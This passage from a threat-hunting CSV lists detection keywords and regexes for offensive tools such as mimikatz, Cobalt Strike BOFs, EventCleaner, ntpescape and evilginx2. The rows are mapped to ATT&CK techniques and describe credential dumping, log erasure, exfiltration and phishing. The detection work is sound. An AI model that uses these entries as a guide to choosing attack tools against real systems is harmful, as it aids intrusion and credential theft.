T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*eval $zrKcKQ*",".{0,1000}eval\s\$zrKcKQ.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A" "*evallen/ntpescape*",".{0,1000}evallen\/ntpescape.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*evasion/has_recycle_bin.*",".{0,1000}evasion\/has_recycle_bin\..{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*evasion_shellcode.js*",".{0,1000}evasion_shellcode\.js.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*event::clear*",".{0,1000}event\:\:clear.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*event::drop*",".{0,1000}event\:\:drop.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*EventAggregation.dll.bak*",".{0,1000}EventAggregation\.dll\.bak.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*EventAggregation.dll.bak*",".{0,1000}EventAggregation\.dll\.bak.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as 
WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*EventAggregation.dll.patched*",".{0,1000}EventAggregation\.dll\.patched.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*EventAggregationPH.dll*",".{0,1000}EventAggregationPH\.dll.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*eventcleaner closehandle*",".{0,1000}eventcleaner\sclosehandle.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*eventcleaner suspend*",".{0,1000}eventcleaner\ssuspend.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*EventCleaner.exe 
*",".{0,1000}EventCleaner\.exe\s.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*EventCleaner.iobj*",".{0,1000}EventCleaner\.iobj.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*EventCleaner\Debug\*",".{0,1000}EventCleaner\\Debug\\.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*eventlog -risk-i-know*",".{0,1000}eventlog\s\-risk\-i\-know.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*eventlog_dos.exe*",".{0,1000}eventlog_dos\.exe.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*eventlog_fucker.py*",".{0,1000}eventlog_fucker\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features 
whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*EventLogCrasher.exe*",".{0,1000}EventLogCrasher\.exe.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*EventLogCrasher-main*",".{0,1000}EventLogCrasher\-main.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*eventlog-fucker.py*",".{0,1000}eventlog\-fucker\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*eventspy.cna*",".{0,1000}eventspy\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*EventSub-Aggressor.*",".{0,1000}EventSub\-Aggressor\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*EventViewerRCE.ps1*",".{0,1000}EventViewerRCE\.ps1.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*EventViewerUAC.*",".{0,1000}EventViewerUAC\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*EventViewerUAC.*",".{0,1000}EventViewerUAC\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event 
Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","128","30","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" "*EventViewerUAC.x64*",".{0,1000}EventViewerUAC\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*EventViewerUAC.x86*",".{0,1000}EventViewerUAC\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*EventViewerUAC_BOF*",".{0,1000}EventViewerUAC_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","128","30","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" "*eventvwr_elevator*",".{0,1000}eventvwr_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*-EventVwrBypass*",".{0,1000}\-EventVwrBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*evilclippy *",".{0,1000}evilclippy\s.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippy.exe*",".{0,1000}EvilClippy\.exe.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*EvilClippy.exe*",".{0,1000}EvilClippy\.exe.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippyManager.*",".{0,1000}EvilClippyManager\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*EvilClippy-master*",".{0,1000}EvilClippy\-master.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - 
TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*EvilClippyMenu*",".{0,1000}EvilClippyMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*evilfeed.go*",".{0,1000}evilfeed\.go.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*evilginx -p*",".{0,1000}evilginx\s\-p.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*evilginx*",".{0,1000}evilginx.{0,1000}","offensive_tool_keyword","evilginx2","evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. which implements its own HTTP and DNS server. 
making it extremely easy to set up and use","T1556 - T1565 - T1056 - T1558 - T1110","TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","7","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*evilginx.exe*",".{0,1000}evilginx\.exe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*evilginx2*",".{0,1000}evilginx2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*Evilginx2-Phishlets*",".{0,1000}Evilginx2\-Phishlets.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials 